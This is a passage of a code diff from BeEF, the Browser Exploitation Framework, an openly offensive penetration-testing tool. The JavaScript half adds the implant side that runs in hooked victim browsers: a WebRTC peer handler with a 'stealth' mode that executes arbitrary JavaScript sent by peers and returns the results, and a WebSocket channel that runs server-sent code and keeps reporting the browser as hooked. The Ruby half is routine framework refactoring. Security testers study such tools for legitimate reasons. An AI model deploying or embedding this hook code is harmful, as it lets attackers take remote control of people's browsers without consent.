+            setTimeout(function() {beefrtcs[peerid].goStealth()},beef.updater.xhr_poll_timeout * 0.4);
+        } else {
+            beefrtcs[peerid].goStealth();
+        }
+
+    // The message to come out of stealth
+    } else if (ev2.data == "!endstealth") {
+
+      if (rtcstealth != null) {
+        beefrtcs[rtcstealth].sendPeerMsg("Coming out of stealth...");
+        rtcstealth = false;
+      }
+
+    // Command to perform arbitrary JS (while stealthed)
+    } else if ((rtcstealth != false) && (ev2.data.charAt(0) == "%")) {
+      if (beefrtcs[peerid].verbose) {console.log('message was a command: '+ev2.data.substring(1) + ' .. and I am in stealth mode');}
+      beefrtcs[rtcstealth].sendPeerMsg("Command result - " + beefrtcs[rtcstealth].execCmd(ev2.data.substring(1)));
+
+    // Command to perform arbitrary JS (while NOT stealthed)
+    } else if ((rtcstealth == false) && (ev2.data.charAt(0) == "%")) {
+      if (beefrtcs[peerid].verbose) {console.log('message was a command - we are not in stealth. Command: '+ ev2.data.substring(1));}
+      beefrtcs[peerid].sendPeerMsg("Command result - " + beefrtcs[peerid].execCmd(ev2.data.substring(1)));
+
+    // Just a plain text message .. (while stealthed)
+    } else if (rtcstealth != false) {
+      if (beefrtcs[peerid].verbose) {console.log('received a message, apparently we are in stealth - so just send it back to peer['+rtcstealth+']');}
+      beefrtcs[rtcstealth].sendPeerMsg(ev2.data);
+
+    // Just a plan text message (while NOT stealthed)
+    } else {
+      if (beefrtcs[peerid].verbose) {console.log('received a message from peer['+peerid+'] - sending it back to beef');}
+      beef.net.send('/rtcmessage',0,{peerid: peerid, message: ev2.data});
+    }
+  } 
+}
+
+// How the browser executes received JS (this is pretty hacky)
+Beefwebrtc.prototype.execCmd = function(input) {
+  var fn = new Function(input);
+  var res = fn();
+  return res.toString();
+}
+
+// Shortcut function to SEND a data messsage
+Beefwebrtc.prototype.sendPeerMsg = function(msg) {
+  if (this.verbose) {console.log('sendPeerMsg to ' + this.peerid);}
+  this.dataChannel.send(msg);
+}
+
+// Try and initiate, will check that system hasn't started, and that signaling is ready, and that TURN servers are ready
+Beefwebrtc.prototype.maybeStart = function() {
+  if (this.verbose) {console.log("maybe starting ... ");}
+
+  if (!this.started && this.signalingReady && this.turnDone) {
+    if (this.verbose) {console.log('Creating PeerConnection.');}
+    this.createPeerConnection();
+
+    this.started = true;
+
+    if (this.initiator) {
+      if (this.verbose) {console.log("Making the call now .. bzz bzz");}
+      this.doCall();
+    } else {
+      if (this.verbose) {console.log("Receiving a call now .. somebuddy answer da fone?");}
+      this.calleeStart();
+    }
+
+  } else {
+    if (this.verbose) {console.log("Not ready to start just yet..");}
+  }
+}
+
+// RTC - create an offer - the caller runs this, while the receiver runs calleeStart()
+Beefwebrtc.prototype.doCall = function() {
+  var constraints = this.mergeConstraints(this.offerConstraints, this.sdpConstraints);
+  var self = this;
+  globalrtc[this.peerid].createOffer(this.setLocalAndSendMessage, this.onCreateSessionDescriptionError, constraints);
+  if (this.verbose) {console.log('Sending offer to peer, with constraints: \n' +
+              '  \'' + JSON.stringify(constraints) + '\'.');}
+}
+
+// Helper method to merge SDP constraints
+Beefwebrtc.prototype.mergeConstraints = function(cons1, cons2) {
+  var merged = cons1;
+  for (var name in cons2.mandatory) {
+    merged.mandatory[name] = cons2.mandatory[name];
+  }
+  merged.optional.concat(cons2.optional);
+  return merged;
+}
+
+// Sets the local RTC session description, sends this information back (via signalling)
+// The caller uses this to set it's local description, and it then has to send this to the peer (via signalling)
+// The receiver uses this information too - and vice-versa - hence the signaling
+Beefwebrtc.prototype.setLocalAndSendMessage = function(sessionDescription) {
+  // This fucking function does NOT receive a 'this' state, and you can't pass additional parameters
+  // Stupid .. javascript :(
+  // So I'm hacking it to find the peerid gah - I believe *this* is what means you can't establish peers concurrently
+  // i.e. this browser will have to wait for this peerconnection to establish before attempting to connect to the next one..
+  var peerid = null;
+
+  for (var k in beefrtcs) {
+    if (beefrtcs[k].allgood === false) {
+      peerid = beefrtcs[k].peerid;
+    }
+  }
+  if (beefrtcs[peerid].verbose) {console.log("For peer: " + peerid + " Running setLocalAndSendMessage...");}
+
+  globalrtc[peerid].setLocalDescription(sessionDescription, onSetSessionDescriptionSuccess, onSetSessionDescriptionError);
+  beefrtcs[peerid].sendSignalMsg(sessionDescription);
+
+  function onSetSessionDescriptionSuccess() {
+    if (beefrtcs[peerid].verbose) {console.log('Set session description success.');}
+  }
+
+  function onSetSessionDescriptionError() {
+    if (beefrtcs[peerid].verbose) {console.log('Failed to set session description');}
+  }
+}
+
+// If the browser can't build an SDP
+Beefwebrtc.prototype.onCreateSessionDescriptionError = function(error) {
+  var localverbose = false;
+
+  for (var k in beefrtcs) {
+    if (beefrtcs[k].verbose === true) {
+      localverbose = true;
+    }
+  }
+  if (localverbose === true) {console.log('Failed to create session description: ' + error.toString());}
+}
+
+// Check for messages - which includes signaling from a calling peer - this gets kicked off in maybeStart()
+Beefwebrtc.prototype.calleeStart = function() {
+  // Callee starts to process cached offer and other messages.
+  while (this.msgQueue.length > 0) {
+    this.processSignalingMessage(this.msgQueue.shift());
+  }
+}
+
+// Process messages, this is how we handle the signaling messages, such as candidate info, offers, answers
+Beefwebrtc.prototype.processSignalingMessage = function(message) {
+  if (!this.started) {
+    if (this.verbose) {console.log('peerConnection has not been created yet!');}
+    return;
+  }
+
+  if (message.type === 'offer') {
+    if (this.verbose) {console.log("Processing signalling message: OFFER");}
+    this.setRemote(message);
+    this.doAnswer();
+  } else if (message.type === 'answer') {
+    if (this.verbose) {console.log("Processing signalling message: ANSWER");}
+    this.setRemote(message);
+  } else if (message.type === 'candidate') {
+    if (this.verbose) {console.log("Processing signalling message: CANDIDATE");}
+    var candidate = new RTCIceCandidate({sdpMLineIndex: message.label,
+                                         candidate: message.candidate});
+    this.noteIceCandidate("Remote", this.iceCandidateType(message.candidate));
+    globalrtc[this.peerid].addIceCandidate(candidate, this.onAddIceCandidateSuccess, this.onAddIceCandidateError);
+  } else if (message.type === 'bye') {
+    this.onRemoteHangup();
+  }
+}
+
+// Used to set the RTC remote session
+Beefwebrtc.prototype.setRemote = function(message) {
+    globalrtc[this.peerid].setRemoteDescription(new RTCSessionDescription(message),
+       onSetRemoteDescriptionSuccess, this.onSetSessionDescriptionError);
+
+  function onSetRemoteDescriptionSuccess() {
+    if (this.verbose) {console.log("Set remote session description success.");}
+  }
+}
+
+// As part of the processSignalingMessage function, we check for 'offers' from peers. If there's an offer, we answer, as below
+Beefwebrtc.prototype.doAnswer = function() {
+  if (this.verbose) {console.log('Sending answer to peer.');}
+  globalrtc[this.peerid].createAnswer(this.setLocalAndSendMessage, this.onCreateSessionDescriptionError, this.sdpConstraints);
+}
+
+// Helper method to determine what kind of ICE Candidate we've received
+Beefwebrtc.prototype.iceCandidateType = function(candidateSDP) {
+  if (candidateSDP.indexOf("typ relay ") >= 0)
+    return "TURN";
+  if (candidateSDP.indexOf("typ srflx ") >= 0)
+    return "STUN";
+  if (candidateSDP.indexOf("typ host ") >= 0)
+    return "HOST";
+  return "UNKNOWN";
+}
+
+// Event handler for successful addition of ICE Candidates
+Beefwebrtc.prototype.onAddIceCandidateSuccess = function() {
+  var localverbose = false;
+
+  for (var k in beefrtcs) {
+    if (beefrtcs[k].verbose === true) {
+      localverbose = true;
+    }
+  }
+  if (localverbose === true) {console.log('AddIceCandidate success.');}
+}
+
+// Event handler for unsuccessful addition of ICE Candidates
+Beefwebrtc.prototype.onAddIceCandidateError = function(error) {
+  var localverbose = false;
+
+  for (var k in beefrtcs) {
+    if (beefrtcs[k].verbose === true) {
+      localverbose = true;
+    }
+  }
+  if (localverbose === true) {console.log('Failed to add Ice Candidate: ' + error.toString());}
+}
+
+// If a peer hangs up (we bring down the peerconncetion via the stop() method)
+Beefwebrtc.prototype.onRemoteHangup = function() {
+  if (this.verbose) {console.log('Session terminated.');}
+  this.initiator = 0;
+  // transitionToWaiting();
+  this.stop();
+}
+
+// Bring down the peer connection
+Beefwebrtc.prototype.stop = function() {
+  this.started = false; // we're no longer started
+  this.signalingReady = false; // signalling isn't ready
+  globalrtc[this.peerid].close(); // close the RTCPeerConnection option
+  globalrtc[this.peerid] = null; // Remove it
+  this.msgQueue.length = 0; // clear the msgqueue
+  rtcstealth = false; // no longer stealth
+  this.allgood = false; // allgood .. NAH UH
+}
+
+// The actual beef.webrtc wrapper - this exposes only two functions directly - start, and status
+// These are the methods which are executed via the custom extension of the hook.js
+beef.webrtc = {
+  // Start the RTCPeerConnection process
+  start: function(initiator,peer,turnjson,stunservers,verbose) {
+    if (peer in beefrtcs) {
+      // If the RTC peer is not in a good state, try kickng it off again
+      // This is possibly not the correct way to handle this issue though :/ I.e. we'll now have TWO of these objects :/
+      if (beefrtcs[peer].allgood == false) {
+        beefrtcs[peer] = new Beefwebrtc(initiator, peer, turnjson, stunservers, verbose);
+        beefrtcs[peer].initialize();
+      }
+    } else {
+      // Standard behaviour for new peer connections
+      beefrtcs[peer] = new Beefwebrtc(initiator,peer,turnjson, stunservers, verbose);
+      beefrtcs[peer].initialize();
+    }
+  },
+
+  // Check the status of all my peers .. 
+  status: function(me) {
+    if (Object.keys(beefrtcs).length > 0) {
+      for (var k in beefrtcs) {
+        if (beefrtcs.hasOwnProperty(k)) {
+          beef.net.send('/rtcmessage',0,{peerid: k, message: "Status checking - allgood: " + beefrtcs[k].allgood});
+        }
+      }
+    } else {
+      beef.net.send('/rtcmessage',0,{peerid: me, message: "No peers?"});
+    }
+  }
+}
+beef.regCmp('beef.webrtc');
--- a/core/main/client/websocket.js
+++ b/core/main/client/websocket.js
@@ -0,0 +1,92 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+
+/**
+ * @Literal object: beef.websocket
+ *
+ * Manage the WebSocket communication channel.
+ * This channel is much faster and responsive, and it's used automatically
+ * if the browser supports WebSockets AND beef.http.websocket.enable = true.
+ */
+
+beef.websocket = {
+
+    socket:null,
+    ws_poll_timeout: "<%= @ws_poll_timeout %>",
+
+    /**
+     * Initialize the WebSocket client object.
+     * Note: use WebSocketSecure only if the hooked origin is under https.
+     * Mixed-content in WS is quite different from a non-WS context.
+     */
+    init:function () {
+        var webSocketServer = beef.net.host;
+        var webSocketPort = "<%= @websocket_port %>";
+        var webSocketSecure = "<%= @websocket_secure %>";
+        var protocol = "ws://";
+
+        if(webSocketSecure && window.location.protocol=="https:"){
+            protocol = "wss://";
+            webSocketPort= "<%= @websocket_sec_port %>";
+        }
+
+        if (beef.browser.isFF() && !!window.MozWebSocket) {
+            beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
+        }else{
+            beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
+        }
+
+    },
+
+    /**
+     * Send Helo message to the BeEF server and start async polling.
+     */
+    start:function () {
+        new beef.websocket.init();
+        this.socket.onopen = function () {
+            beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
+            beef.websocket.alive();
+        };
+
+        this.socket.onmessage = function (message) {
+            // Data coming from the WebSocket channel is either of String, Blob or ArrayBufferdata type.
+            // That's why it needs to be evaluated first. Using Function is a bit better than pure eval().
+            // It's not a big deal anyway, because the eval'ed data comes from BeEF itself, so it is implicitly trusted.
+            new Function(message.data)();
+        };
+
+        this.socket.onclose = function () {
+            setTimeout(function(){beef.websocket.start()}, 5000);
+        };
+    },
+
+    /**
+     * Send data back to BeEF. This is basically the same as beef.net.send,
+     * but doesn't queue commands.
+     * Example usage:
+     * beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
+     * '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
+     * '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
+     */
+    send:function (data) {
+        try {
+            this.socket.send(data);
+        }catch(err){}
+    },
+
+    /**
+     * Polling mechanism, to notify the BeEF server that the browser is still hooked,
+     * and the WebSocket channel still alive.
+     * todo: there is probably a more efficient way to do this. Double-check WebSocket API.
+     */
+    alive: function (){
+        beef.websocket.send('{"alive":"'+beef.session.get_hook_session_id()+'"}');
+        setTimeout("beef.websocket.alive()", beef.websocket.ws_poll_timeout);
+    }
+};
+
+beef.regCmp('beef.websocket');
--- a/core/main/command.rb
+++ b/core/main/command.rb
@@ -1,222 +1,206 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
-module Core
+  module Core

-  # @note This module contains a list of utils functions to use when writing commands
-  module CommandUtils
-    
-    # Format a string to support multiline in javascript.
-    # @param [String] text String to convert
-    # @return [String] Formatted string
-    def format_multiline(text); text.gsub(/\n/, '\n'); end
-    
-  end
+    # @note This module contains a list of utils functions to use when writing commands
+    module CommandUtils

+      # Format a string to support multiline in javascript.
+      # @param [String] text String to convert
+      # @return [String] Formatted string
+      def format_multiline(text); text.gsub(/\n/, '\n'); end

-  
-  # @note The Command Module Context is being used when evaluating code in eruby.
-  #   In other words, we use that code to add funky functions to the
-  #   javascript templates of our commands.
-  class CommandContext < Erubis::Context
-    include BeEF::Core::CommandUtils
-    
-    # Constructor
-    # @param [Hash] hash
-    def initialize(hash=nil); 
-      super(hash); 
    end
-    
-  end
-  
-  # @note This class is the base class for all command modules in the framework.
-  #   Two instances of this object are created during the execution of command module.
-  class Command
-  
-    attr_reader :datastore, :path, :default_command_url, :beefjs_components, :friendlyname
-    attr_accessor :zombie, :command_id, :session_id
-    
-    include BeEF::Core::CommandUtils
-    include BeEF::Core::Constants::Browsers
-    include BeEF::Core::Constants::CommandModule

-    # Super class controller
-    # @param [String] key command module key
-    def initialize(key)
-      get_extensions
-      config = BeEF::Core::Configuration.instance

-      @key = key
-      @datastore = {}
-      @friendlyname = config.get("beef.module.#{key}.name")
-      @output = ''
-      @path = config.get("beef.module.#{key}.path")
-      @default_command_url = config.get("beef.module.#{key}.mount")
-      @id = config.get("beef.module.#{key}.db.id")
-      @auto_update_zombie = false
-      @results = {}
-      @beefjs_components = {}
-    end
-    
-    # Uses the API to include all the code from extensions that need to add methods, constants etc to that class.
-    # @todo Determine if this method is deprecated
-    def get_extensions
-      BeEF::API::Command.extended_in_modules.each do |mod|
-        self.class.send(:include, mod)
+
+    # @note The Command Module Context is being used when evaluating code in eruby.
+    #   In other words, we use that code to add funky functions to the
+    #   javascript templates of our commands.
+    class CommandContext < Erubis::Context
+      include BeEF::Core::CommandUtils
+
+      # Constructor
+      # @param [Hash] hash
+      def initialize(hash=nil);
+      super(hash);
      end
-    end
-    
-    # This function is called just before the instructions are sent to hooked browser.
-    def pre_send; end
-    
-    # Callback method. This function is called when the hooked browser sends results back.
-    def callback; end
-    
-    # If the command requires some data to be sent back, this function will process them.
-    # @param [] head
-    # @param [Hash] params Hash of parameters
-    # @todo Determine argument "head" type
-    def process_zombie_response(head, params); end
-    
-    # Returns true if the command needs configurations to work. False if not.
-    # @deprecated This command should not be used since the implementation of the new configuration system
-    def needs_configuration?; !@datastore.nil?; end
-    
-    # Returns information about the command in a JSON format.
-    # @return [String] JSON formatted string
-    def to_json
-       {
-        'Name'          => @friendlyname,
-        'Description'   => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.description"),
-        'Category'      => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.category"),
-        'Data'          => BeEF::Module.get_options(@key)            
-      }.to_json
-    end
-    
-    # Builds the 'datastore' attribute of the command which is used to generate javascript code.
-    # @param [Hash] data Data to be inserted into the datastore
-    # @todo Confirm argument "data" type
-    def build_datastore(data); 
-      @datastore = JSON.parse(data)
-    end
-    
-    # Sets the datastore for the callback function. This function is meant to be called by the CommandHandler
-    # @param [Hash] http_params HTTP parameters
-    # @param [Hash] http_headers HTTP headers
-    def build_callback_datastore(http_params, http_headers)
-      @datastore = {'http_headers' => {}} # init the datastore
-      
-      # get, check and add the http_params to the datastore
-      http_params.keys.each { |http_params_key|
-        (print_error 'http_params_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_params_key)
-        http_params_value = Erubis::XmlHelper.escape_xml(http_params[http_params_key])
-        (print_error 'http_params_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_params_value)
-        @datastore[http_params_key] = http_params_value # add the checked key and value to the datastore
-      }

-      # get, check and add the http_headers to the datastore
-      http_headers.keys.each { |http_header_key|
-        (print_error 'http_header_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_header_key)
-        http_header_value = Erubis::XmlHelper.escape_xml(http_headers[http_header_key][0])
-        (print_error 'http_header_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_header_value)
-        @datastore['http_headers'][http_header_key] = http_header_value # add the checked key and value to the datastore
-      } 
    end
-    
-    # Returns the output of the command. These are the actual instructions sent to the browser.
-    # @return [String] The command output
-    def output
+
+    # @note This class is the base class for all command modules in the framework.
+    #   Two instances of this object are created during the execution of command module.
+    class Command
+
+      attr_reader :datastore, :path, :default_command_url, :beefjs_components, :friendlyname
+      attr_accessor :zombie, :command_id, :session_id
+
+      include BeEF::Core::CommandUtils
+      include BeEF::Core::Constants::Browsers
+      include BeEF::Core::Constants::CommandModule
+
+      # Super class controller
+      # @param [String] key command module key
+      def initialize(key)
+        config = BeEF::Core::Configuration.instance
+
+        @key = key
+        @datastore = {}
+        @friendlyname = config.get("beef.module.#{key}.name")
+        @output = ''
+        @path = config.get("beef.module.#{key}.path")
+        @default_command_url = config.get("beef.module.#{key}.mount")
+        @id = config.get("beef.module.#{key}.db.id")
+        @auto_update_zombie = false
+        @results = {}
+        @beefjs_components = {}
+      end
+
+      # This function is called just before the instructions are sent to hooked browser.
+      def pre_send; end
+
+      # Callback method. This function is called when the hooked browser sends results back.
+      def callback; end
+
+      # If the command requires some data to be sent back, this function will process them.
+      # @param [] head
+      # @param [Hash] params Hash of parameters
+      # @todo Determine argument "head" type
+      def process_zombie_response(head, params); end
+
+      # Returns true if the command needs configurations to work. False if not.
+      # @deprecated This command should not be used since the implementation of the new configuration system
+      def needs_configuration?; !@datastore.nil?; end
+
+      # Returns information about the command in a JSON format.
+      # @return [String] JSON formatted string
+      def to_json
+        {
+            'Name'          => @friendlyname,
+            'Description'   => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.description"),
+            'Category'      => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.category"),
+            'Data'          => BeEF::Module.get_options(@key)
+        }.to_json
+      end
+
+      # Builds the 'datastore' attribute of the command which is used to generate javascript code.
+      # @param [Hash] data Data to be inserted into the datastore
+      # @todo Confirm argument "data" type
+      def build_datastore(data);
+      @datastore = JSON.parse(data)
+      end
+
+      # Sets the datastore for the callback function. This function is meant to be called by the CommandHandler
+      # @param [Hash] http_params HTTP parameters
+      # @param [Hash] http_headers HTTP headers
+      def build_callback_datastore(http_params, http_headers, result, command_id, beefhook)
+        @datastore = {'http_headers' => {}} # init the datastore
+
+        # get, check and add the http_params to the datastore
+        http_params.keys.each { |http_params_key|
+          (print_error 'http_params_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_params_key)
+          http_params_value = Erubis::XmlHelper.escape_xml(http_params[http_params_key])
+          (print_error 'http_params_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_params_value)
+          @datastore[http_params_key] = http_params_value # add the checked key and value to the datastore
+        }
+
+        # get, check and add the http_headers to the datastore
+        http_headers.keys.each { |http_header_key|
+          (print_error 'http_header_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_header_key)
+          http_header_value = Erubis::XmlHelper.escape_xml(http_headers[http_header_key][0])
+          (print_error 'http_header_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_header_value)
+          @datastore['http_headers'][http_header_key] = http_header_value # add the checked key and value to the datastore
+        }
+        @datastore['results'] = result
+        @datastore['cid'] = command_id
+        @datastore['beefhook'] = beefhook		
+      end
+
+      # Returns the output of the command. These are the actual instructions sent to the browser.
+      # @return [String] The command output
+      def output
        f = @path+'command.js'
        (print_error "#{f} file does not exist";return) if not File.exists? f

        command = BeEF::Core::Models::Command.first(:id => @command_id)
-        
-        @eruby = Erubis::FastEruby.new(File.read(f)) 
+
+        @eruby = Erubis::FastEruby.new(File.read(f))

        data = BeEF::Core::Configuration.instance.get("beef.module.#{@key}")
        cc = BeEF::Core::CommandContext.new
        cc['command_url'] = @default_command_url
        cc['command_id'] = @command_id
        JSON.parse(command['data']).each{|v|
-            cc[v['name']] = v['value']
+          cc[v['name']] = v['value']
        }
        if self.respond_to?(:execute)
-            self.execute
+          self.execute
        end
        @output = @eruby.evaluate(cc)
-      
-      @output
-    end
-    
-    # Saves the results received from the hooked browser
-    # @param [Hash] results Results from hooked browser
-    def save(results)
-      @results = results
-    end

-    # If nothing else than the file is specified, the function will map the file to a random path without any extension.
-    # @param [String] file File to be mounted
-    # @param [String] path URL path to mounted file
-    # @param [String] extension URL extension
-    # @param [Integer] count The amount of times this file can be accessed before being automatically unmounted
-    # @deprecated This function is possibly deprecated in place of the API
-    def map_file_to_url(file, path=nil, extension=nil, count=1)
-           return  BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(file, path, extension, count)
-    end
-    
-    # Tells the framework to load a specific module of the BeEFJS library that the command will be using.
-    # @param [String] component String of BeEFJS component to load
-    # @note Example: use 'beef.net.local'
-    def use(component)
-      return if @beefjs_components.include? component
-      
-      component_path = '/'+component
-      component_path.gsub!(/beef./, '')
-      component_path.gsub!(/\./, '/')
-      component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
-      
-      raise "Invalid beefjs component for command module #{@path}" if not File.exists?(component_path)
-      
-      @beefjs_components[component] = component_path
-    end
+        @output
+      end

-    # @todo Document
-    def oc_value(name)
+      # Saves the results received from the hooked browser
+      # @param [Hash] results Results from hooked browser
+      def save(results)
+        @results = results
+      end
+
+      # If nothing else than the file is specified, the function will map the file to a random path without any extension.
+      # @param [String] file File to be mounted
+      # @param [String] path URL path to mounted file
+      # @param [String] extension URL extension
+      # @param [Integer] count The amount of times this file can be accessed before being automatically unmounted
+      # @deprecated This function is possibly deprecated in place of the API
+      def map_file_to_url(file, path=nil, extension=nil, count=1)
+        return  BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(file, path, extension, count)
+      end
+
+      # Tells the framework to load a specific module of the BeEFJS library that the command will be using.
+      # @param [String] component String of BeEFJS component to load
+      # @note Example: use 'beef.net.local'
+      def use(component)
+        return if @beefjs_components.include? component
+
+        component_path = '/'+component
+        component_path.gsub!(/beef./, '')
+        component_path.gsub!(/\./, '/')
+        component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
+
+        raise "Invalid beefjs component for command module #{@path}" if not File.exists?(component_path)
+
+        @beefjs_components[component] = component_path
+      end
+
+      # @todo Document
+      def oc_value(name)
        option =  BeEF::Core::Models::OptionCache.first(:name => name)
-		return nil if not option
-      	return option.value
-	end
+        return nil if not option
+        return option.value
+      end
+
+      # @todo Document
+      def apply_defaults()
+        @datastore.each { |opt|
+          opt["value"] = oc_value(opt["name"]) || opt["value"]
+        }
+      end
+
+      private
+
+      @use_template
+      @eruby
+      @update_zombie
+      @results
+
+    end
+

-    # @todo Document
-	def apply_defaults()
-	    @datastore.each { |opt|
-		    opt["value"] = oc_value(opt["name"]) || opt["value"]
-		}
-	end
-  
-    private
-    
-    @use_template
-    @eruby
-    @update_zombie
-    @results
-    
  end
-  
-
-end
 end
--- a/core/main/configuration.rb
+++ b/core/main/configuration.rb
@@ -1,129 +1,128 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
-module Core
+  module Core

-  class Configuration
-    
-    include Singleton
-  
-    # Loads the default configuration system
-    # @param [String] configuration_file Configuration file to be loaded, by default loads $root_dir/config.yaml
-    def initialize(configuration_file="#{$root_dir}/config.yaml")
-      # argument type checking
-      raise Exception::TypeError, '"configuration_file" needs to be a string' if not configuration_file.string?
-      # test to make sure file exists
-      raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(configuration_file)
-      begin
-         #open base config
-         @config = self.load(configuration_file)
-         # set default value if key? does not exist
-         @config.default = nil
-      rescue Exception => e
-         print_error "Fatal Error: cannot load configuration file"
-         print_debug e
+    class Configuration
+
+      attr_accessor :config
+
+      # antisnatchor: still a singleton, but implemented by hand because we want to have only one instance
+      # of the Configuration object while having the possibility to specify a parameter to the constructor.
+      # This is  why we don't use anymore the default Ruby implementation -> include Singleton
+      def self.instance()
+        return @@instance
      end
-    end

-    # Loads yaml file
-    # @param [String] file YAML file to be loaded
-    # @return [Hash] YAML formatted hash
-    def load(file)
-      begin
-         return nil if not File.exists?(file)
-         raw = File.read(file)
-         return YAML.load(raw)
-      rescue Exception => e
-         print_debug "Unable to load '#{file}' #{e}"
-         return nil
+      # Loads the default configuration system
+      # @param [String] configuration_file Configuration file to be loaded, by default loads $root_dir/config.yaml
+      def initialize(config)
+        raise Exception::TypeError, '"config" needs to be a string' if not config.string?
+        raise Exception::TypeError, "Configuration file '#{config}' cannot be found" if not File.exist?(config)
+        begin
+          #open base config
+          @config = self.load(config)
+          # set default value if key? does not exist
+          @config.default = nil
+          @@config = config
+        rescue => e
+          print_error "Fatal Error: cannot load configuration file"
+          print_debug e
+        end
+        @@instance = self
      end
-    end

-    # Returns the value of a selected key in the configuration file.
-    # @param [String] key Key of configuration item
-    # @return [Hash|String] The resulting value stored against the 'key'
-    def get(key)
+      # Loads yaml file
+      # @param [String] file YAML file to be loaded
+      # @return [Hash] YAML formatted hash
+      def load(file)
+        begin
+          return nil if not File.exists?(file)
+          raw = File.read(file)
+          return YAML.load(raw)
+        rescue => e
+          print_debug "Unable to load '#{file}' #{e}"
+          return nil
+        end
+      end
+
+      # Returns the value of a selected key in the configuration file.
+      # @param [String] key Key of configuration item
+      # @return [Hash|String] The resulting value stored against the 'key'
+      def get(key)
        subkeys = key.split('.')
        lastkey = subkeys.pop
        subhash = subkeys.inject(@config) do |hash, k|
-            hash[k]
+          hash[k]
        end
-        return (subhash != nil and subhash.has_key?(lastkey)) ? subhash[lastkey] : nil 
-    end
+        return (subhash != nil and subhash.has_key?(lastkey)) ? subhash[lastkey] : nil
+      end

-    # Sets the give key value pair to the config instance
-    # @param [String] key The configuration key
-    # @param value The value to be stored against the 'key'
-    # @return [Boolean] If the store procedure was successful
-    def set(key, value)
+      # Sets the give key value pair to the config instance
+      # @param [String] key The configuration key
+      # @param value The value to be stored against the 'key'
+      # @return [Boolean] If the store procedure was successful
+      def set(key, value)
        subkeys = key.split('.').reverse
        return false if subkeys.length == 0
        hash = {subkeys.shift.to_s => value}
        subkeys.each{|v|
-            hash = {v.to_s => hash}
+          hash = {v.to_s => hash}
        }
        @config = @config.deep_merge(hash)
        return true
-    end
+      end

-    # Clears the given key hash
-    # @param [String] key Configuration key to be cleared
-    # @return [Boolean] If the configuration key was cleared
-    def clear(key)
+      # Clears the given key hash
+      # @param [String] key Configuration key to be cleared
+      # @return [Boolean] If the configuration key was cleared
+      def clear(key)
        subkeys = key.split('.')
        return false if subkeys.length == 0
        lastkey = subkeys.pop
        hash = @config
        subkeys.each{|v|
-            hash = hash[v]
+          hash = hash[v]
        }
-        return (hash.delete(lastkey) == nil) ? false : true    
-    end
+        return (hash.delete(lastkey) == nil) ? false : true
+      end

-    # Load extensions configurations
-    def load_extensions_config
+      # Load extensions configurations
+      def load_extensions_config
        self.set('beef.extension', {})
        Dir.glob("#{$root_dir}/extensions/*/config.yaml") do | cf |
-            y = self.load(cf)
-            if y != nil
-                y['beef']['extension'][y['beef']['extension'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
-                @config = y.deep_merge(@config)
-            else
-               print_error "Unable to load extension configuration '#{cf}'"
-            end
+          y = self.load(cf)
+          if y != nil
+            y['beef']['extension'][y['beef']['extension'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
+            @config = y.deep_merge(@config)
+          else
+            print_error "Unable to load extension configuration '#{cf}'"
+          end
        end
-    end
+      end

-    # Load module configurations
-    def load_modules_config
+      # Load module configurations
+      def load_modules_config
        self.set('beef.module', {})
-        Dir.glob("#{$root_dir}/modules/**/*/config.yaml") do | cf |
-            y = self.load(cf)
-            if y != nil
-                y['beef']['module'][y['beef']['module'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
-                @config = y.deep_merge(@config)
-                # API call for post module config load
